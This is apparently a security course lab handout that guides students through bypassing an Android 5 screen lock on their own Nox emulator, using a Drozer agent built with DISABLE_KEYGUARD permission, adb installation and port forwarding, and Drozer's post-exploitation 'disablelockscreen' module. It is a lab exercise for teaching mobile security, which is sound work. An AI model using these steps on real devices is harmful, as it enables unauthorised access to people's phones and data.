Proj 13x: Bypassing a Screen Lock with Nox (10 pts)

What You Need for This Project

A Nox Android emulator, with Kali and adb connected to it, which you prepared in previous projects. The host system can be either two PCs or one Mac.

Purpose

To bypass a screen lock using a Drozer agent on an Android 5 device. Don't use a more recent Android version or it won't work.

Start Nox

Start Nox. If there is no PIN, Open Settings, Security, "Screen lock" and assign a PIN of 1234 as shown below.

Restart Nox

Close Nox and start it again. Swipe up but don't enter the PIN, so you see the lock screen, as shown below.

Downgrading Java

Drozer can't sign apps with recent Java versions, so we need to downgrade Java.

Execute these commands to do that.

apt update apt install openjdk-8-jdk -y

If an "Outdated processor microcode" box appears, press Enter.

Execute this command to reboot Kali.

reboot

Execute this command to select the default version of javac, the Java compiler:

update-alternatives --config javac

Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.

Execute this command to select the default version of java:

update-alternatives --config java

Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.

Building a Drozer App

To build a Drozer app that requests DISABLE_KEYGUARD permission, in Kali, in a Terminal, at the # bash prompt, execute this command:

drozer agent build --permission android.permission.DISABLE_KEYGUARD

The agent is built and placed in the /tmp directory. Note the path to the agent, highlighted in the image below.

Connecting with ADB

As you did in previous projects, connect to your Nox emulator from Kali, as shown below.

Installing the App

In Kali, in a Terminal, at the # bash prompt, execute these commands to remove any existing agent and install the new one. Replace the path in the second command to match the correct path on ypur system.

adb uninstall com.mwr.dz adb install /tmp/tmpvJw0NB/agent.apk

The agent installs, as shown below.

Starting the App

In Kali, in a Terminal, at the # bash prompt, execute these commands, to start the agent and forward the TCP port back to Kali.

adb shell am broadcast -n com.mwr.dz/.receivers.Receiver -c com.mwr.dz.START_EMBEDDED adb forward tcp:31415 tcp:31415

The commands succeed, as shown below. <

Installing Drozer Modules

In Kali, in a Terminal, at the # bash prompt, execute these commands, to launch Drozer and install the post-exploitation modules.

drozer console connect module install post

When Drozer asks for a directory to put the modules in, enter this directory:

/usr/local/drozer

The modules install, as shown below.

Unlocking the Phone

In Kali, in a Terminal, at the # bash prompt, execute this command.

run post.perform.disablelockscreen

The phone is unlocked, and Drozer returns a message saying "Done. Check device." message, as shown below.

Saving a Screen Image

Make sure the "Done. Check device." message is visible, as shown above.

Save a full-desktop image. On a Mac, press Shift+Commmand+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 13x", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to to cnit.128sam@gmail.com with the subject line: Proj 13x from YOUR NAME

Posted 3-20-19